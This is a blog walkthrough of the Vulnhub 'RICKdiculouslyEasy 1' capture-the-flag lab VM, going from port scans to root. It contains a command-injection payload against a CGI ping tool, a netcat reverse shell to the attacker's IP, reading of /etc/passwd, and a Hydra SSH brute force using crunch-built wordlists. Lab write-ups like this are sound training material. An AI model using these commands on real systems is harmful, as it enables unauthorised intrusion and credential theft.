RICKdiculouslyEasy 1 Vulnhub Walkthrough

So here is some information about the challenge from the creator:

This is a fedora server vm, created with virtualbox.
It is a very simple Rick and Morty themed boot to root.
There are 130 points worth of flags available (each flag has its points recorded with it), you should also get root.
It’s designed to be a beginner ctf, if you’re new to pen testing, check it out!

https://www.vulnhub.com/entry/rickdiculouslyeasy-1,207/

Some feedback from me before you start reading!

This image is perfect for beginners or students.
Its is themed by Rick&Morty series. I am a huge fun so I really enjoyed it but even if you don’t watch the series you will definitely have fun. But seriously, start the series.
Interesting challenges that are connected to each other that cover a variety of fields and tools.
Generally a really really fun to play boot2root, maybe one of the best I have ever played.

MAKE YOURSELF A FAVOR AND PLAY IT. DONT TAKE TO MANY SNEAKPICKS. ITS PRETTY DO-ABLE

Starting with an Nmap scan

nmap -sS -sU -T4 -A -v 192.168.2.2
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              42 Aug 22  2017 FLAG.txt
|_drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.2.9
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh?
| fingerprint-strings: 
|   NULL: 
|_    Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
80/tcp   open  http    Apache httpd 2.4.27 ((Fedora))
| http-methods: 
|   Supported Methods: HEAD GET POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.27 (Fedora)
|_http-title: Morty's Website
9090/tcp open  http    Cockpit web service
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: Did not follow redirect to https://192.168.2.2:9090/

Lets connect to the ftp

ftp 192.168.2.2
Connected to 192.168.2.2.
220 (vsFTPd 3.0.3)
Name (192.168.2.2:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0              42 Aug 22  2017 FLAG.txt
drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
226 Directory send OK.
ftp>

FLAG{Whoa this is unexpected} – 10 Points

POINTS: 10
POINTS_TO_GO: 120

vsftpd 3.0.3 no vulnerabilities from searchsploit
We could bruteforce but not for now.

Lets try to login with SSH on port 22

ssh 192.168.2.2:
ssh_exchange_identification: Connection closed by remote host
Nothing we can do. Also no version was identified by Nmap

Lets move on to port 80

nikto -h 192.168.2.2
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.2.2
+ Target Hostname:    192.168.2.2
+ Target Port:        80
+ Start Time:         2019-01-08 14:52:02 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.27 (Fedora)
+ Server leaks inodes via ETags, header found with file /, fields: 0x146 0x557458caf66e2 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /passwords/: Directory indexing found.
+ OSVDB-3092: /passwords/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8327 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2019-01-08 14:52:40 (GMT-5) (38 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Lets open 192.168.2.2
Nothing Interesting on the page source or in the image.

Lets view /passwords

We got another flag

FLAG{Yeah d- just don’t do it.} – 10 Points

POINTS: 20
POINTS_TO_GO: 110

Lets open http://192.168.2.2/passwords/passwords.html
Opening the source code reveals a password “winter”

<!DOCTYPE html>
<html>
<head>
<title>Morty's Website</title>
<body>Wow Morty real clever. Storing passwords in a file called passwords.html? You've really done it this time Morty. Let me at least hide them.. I'd delete them entirely but I know you'd go bitching to your mom. That's the last thing I need.</body>
<!--Password: winter-->
</head>
</html>

Moving to robots.txt


view-source:http://192.168.2.2/cgi-bin/root_shell.cgi

<html><head><title>Root Shell
</title></head>
--UNDER CONSTRUCTION--
<!--HAAHAHAHAAHHAaAAAGGAgaagAGAGAGG-->
<!--I'm sorry Morty. It's a bummer.-->
</html>

I guess Rick is messing with us. That was way to good to be true. 😒

Moving to http://192.168.2.2/cgi-bin/tracertool.cgi

A super cool webpage to ping IPs.
When we try 127.0.0.1 we get a response.

Lets try to add another command after the ping

eg: 127.0.0.1; id;

DAAAMN Morty 😍, the command is successful executed and we got a text result back.
So actually now we have a stupid put fine working shell.
Everything we type after 127.0.0.1; will be executed.

So testing with the following commands to take a look at the directories did not return anything useful.

127.0.0.1; ls;
127.0.0.1; cd ..; ls;
127.0.0.1; cd ..; cd ..; ls;

Funny thing, cat command has been replaced with an ASCII cat! Well that made me laugh! 😂😂

Then I had an idea. Can I ping my machine?
An yes I can!

So lets start open a basic remote shell.
I use netcat to start listening on port 4444

nc –lvp 4444

Then I craft the new malicious “ping” command with netcat to broadcast on my IP:PORT with the /bin/bash

127.0.0.1; nc 192.168.2.9 4444 -e /bin/bash;

And I immediately get a shell back on my machine. 😎

So we got a shell that is running under the user Apache.
Tried to find other interesting files or directories for flags but with no luck.
We will return here really soon.
Lets view port 9090

And we got another flag

FLAG{There is no Zeus, in your face!} – 10 Points

POINTS: 30
POINTS_TO_GO: 100

No hints in the code. Web page seems broken.

So far I have captured a few flags, found a password that never had the change to use “winter” and go a reverse shell as the low privileged user “apache”.

Ok so here I got stuck, even if it is a beginner, RICKdiculouslyEasy machine.
Pretty embarrassing I know.😭

So I Google other write ups and try to take only a sneakpeak without spoiling everything.
And I found that my Nmap scan had failed massive. I have missed really important ports.

Lets scan again, this time more carefully. (-p- parameter scans all ports 1 to 65535)

nmap -sS 192.168.2.2 -p-

Well that was painful to watch. 😱😱

Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-08 16:22 EST
Nmap scan report for 192.168.2.2 (192.168.2.2)
Host is up (0.00058s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
9090/tcp  open  zeus-admin
13337/tcp open  unknown
22222/tcp open  easyengine
60000/tcp open  unknown

Lets do some service identification on the ports I previously missed.

nmap -sS 192.168.2.2 -p 9090,13337,22222,60000 -sV
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-08 16:24 EST
Nmap scan report for 192.168.2.2 (192.168.2.2)
Host is up (0.00033s latency).

PORT      STATE SERVICE VERSION
9090/tcp  open  http    Cockpit web service
13337/tcp open  unknown
22222/tcp open  ssh     OpenSSH 7.5 (protocol 2.0)
60000/tcp open  unknown
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port13337-TCP:V=7.70%I=7%D=1/8%Time=5C351522%P=x86_64-pc-linux-gnu%r(NU
SF:LL,29,"FLAG:{TheyFoundMyBackDoorMorty}-10Points\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port60000-TCP:V=7.70%I=7%D=1/8%Time=5C351528%P=x86_64-pc-linux-gnu%r(NU
SF:LL,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20reverse\x20shell\.\.\
SF:.\n#\x20")%r(ibm-db2,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20rev
SF:erse\x20shell\.\.\.\n#\x20");

We found another SSH service running on 22222 and 13337,60000 remain a mystery.
But we got a flag from the banner of service 13337

FLAG{TheyFoundMyBackDoorMorty} – 10 Points

POINTS: 40
POINTS_TO_GO: 90

It also says something about a backdoor. Well that is convenient.
Lets telnet 13337.

telnet 192.168.2.2 13337

Nop, nothing.

telnet 192.168.2.2 13337

Trying 192.168.2.2...
Connected to 192.168.2.2.
Escape character is '^]'.
FLAG:{TheyFoundMyBackDoorMorty}-10Points
Connection closed by foreign host.

Moving on to port 60000
This port is interesting from the beginning as we got this strange but exciting string from the Nmap banner grab.
“Welcome\x20to\x20Ricks\x20half\x20baked\x20reverse\x20shell\.\.\SF:.\n#\x20”

nc 192.168.2.2 60000

Thank you Rick! You might be a super genius asshole but I guess you kinda suck at InfoSec.

ls returns another flag

FLAG{Flip the pickle Morty!} – 10 Points

POINTS: 50
POINTS_TO_GO: 80

Lets run whoami

OMG Ricky! You filthy irresponsible animal! 😱😂😂

We are root but cant change directory strangely. ls returns only the flag.txt

I cant escape the blackhole directory. I guess the name is not random at all.

Lets move on to Port 2222

Tried to connect as root ssh root@192.168.2.2 -p 22222
The only password I know is winter.

No luck.

The good thing is that now we have an SSH service that at least accepting connections. (Port 22 was refusing any connection)

Maybe this password is for another user. I have to find other users. Other users are located on /etc/passwd.
How am I going to access this file?

Back to my netcat shell I have opened in terminal that runs as apache.

cat /etc/passwd

That fucking cat again. I totally forgot it.

I need another simple program to read the content. nano, vim wont work as I am connected from a simple nc.

I know that head show the top line of a text file. But usually new users are located on the bottom of passwd file.
So I use less

less /etc/passwd

Hell yeah!👌

RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash
Morty:x:1001:1001::/home/Morty:/bin/bash
Summer:x:1002:1002::/home/Summer:/bin/bash

Lets try them on port 2222

ssh RickSanchez@192.168.2.2 -p 22222
RickSanchez@192.168.2.2's password: 
Permission denied, please try again.

ssh Morty@192.168.2.2 -p 22222
Morty@192.168.2.2's password: 
Permission denied, please try again.

ssh Summer@192.168.2.2 -p 22222
Summer@192.168.2.2's password: 
Last login: Wed Aug 23 19:20:29 2017 from 192.168.56.104
[Summer@desktop-7f9m85h ~]$ 

ls reveals another flag.

FLAG{Get off the high road Summer!} – 10 Points

POINTS: 60
POINTS_TO_GO: 70

Ohhh I get it. Summer & Winter👀

So this is getting really interesting.

Starting with Mortys Home direcotry, I want to download his files to my local machine so I use scp.

scp -P 22222 Summer@192.168.2.2:/home/Morty/Safe_Password.jpg /root/Downloads/Morty
and again
scp -P 22222 Summer@192.168.2.2:/home/Morty/journal.txt.zip /root/Downloads/Morty

journal.txt.zip uses a password, no idea but I guess those two files are connected so maybe the password is in Safe_Password.jpg file.

Here is the image, nothing shows up at first sight. I guess it is time for some Steganography.

I dont know much about Steg so I googled and found some tools like exiftool, steghide, stegosuite

No luck with exiftool
No luck with steghide
No luck with stegosuite

I even manually zoom on Ricks teeth to find a secret password. Nothing😩

Stuck again.

Googled, again.

strings Safe_Password.jpg

Successfully unziped journal.txt.zip withpassword “Meeseek”

And we got another flag!

FLAG: {131333} – 20 Points

POINTS: 80
POINTS_TO_GO: 50

So now moving to /home/RickSanchez directory to download his files to our local machine.

scp -P 22222 Summer@192.168.2.2:/home/RickSanchez/ThisDoesntContainAnyFlags/NotAFlag.txt /root/Downloads/Rick
scp -P 22222 Summer@192.168.2.2:/home/RickSanchez/RICKS_SAFE/safe /root/Downloads/Rick

So NotAFlag.txt is actually not a flag even if I am not really convinced yet. So lets keep

File safe seems like an executable. Maybe I should start run it on Ricks server.

So it is actually an executable but I cannot run it.

I tried su command but Summer is not in the sudoers group apparently.

Summer doesn’t have the proper permissions to execute the file but we dont really care cause we have already downloaded it to our host machine.

So it says something about arguments. So we have to pass an argument to the executable and I am pretty sure that would be the password.

After a few tries I opened the file with a previous flag. That safe remember? 😁

An by passing the password as an argument we successfully executed the safe.

FLAG{And Awwwaaaaayyyy we Go!} – 20 Points

POINTS: 100
POINTS_TO_GO: 30

So this is a password reminder for Rick.
We have to understand what does he mean by that.
Huge fan of the series but I dont remember his band (sorry rick 😋).
But god bless Google

So it is called the “The Flesh Curtains” LOL

Here is a poster

Lets follow his directions and make the password. Probably the root password from what he says.

1 uppercase character
1 digit
One of the words in my old bands name.

So we have to create a wordlist [One letter from a-z][On number 0-9][“The” or “Flesh” or “Curtains”]

Lets use crunch. I googled ALOT to find out how I can create the appropriate wordlist.
There are multiple methods but this one seemed to me the easiest one.

crunch 5 5 -t ,%The > the_wordlist.txt
crunch 7 7 -t ,%Flesh > flesh_wordlist.txt
crunch 10 10 -t ,%Curtains > curtains_wordlist.txt

And verifying the results

Lets fire up Hydra to brute force

hydra -l root -P the_wordlist.txt ssh://192.168.2.2 -s 22222
FAIL
hydra -l root -P flesh_wordlist.txt ssh://192.168.2.2 -s 22222
FAIL
hydra -l root -P curtains_wordlist.txt ssh://192.168.2.2 -s 22222
FAIL

Starting to freak out…😧

hydra -l RickSanchez -P the_wordlist.txt ssh://192.168.2.2 -s 22222
FAIL
hydra -l RickSanchez -P flesh_wordlist.txt ssh://192.168.2.2 -s 22222
FAIL
hydra -l RickSanchez -P curtains_wordlist.txt ssh://192.168.2.2 -s 22222

SUCCESS! P7Curtains is the password

Now lets connect.

FINALLY!

Now Rick mentioned that “sudo is wheely good!”

Lets try su command again. And success we a root and found the last flag.

FLAG: {Ionic Defibrillator} – 30 points

POINTS: 130
POINTS_TO_GO: 0

——————————————

Lessons learned:
1) I should be more careful with port scanning.
2) I should practice more on steg.

Leave a Reply

Your email address will not be published. Required fields are marked *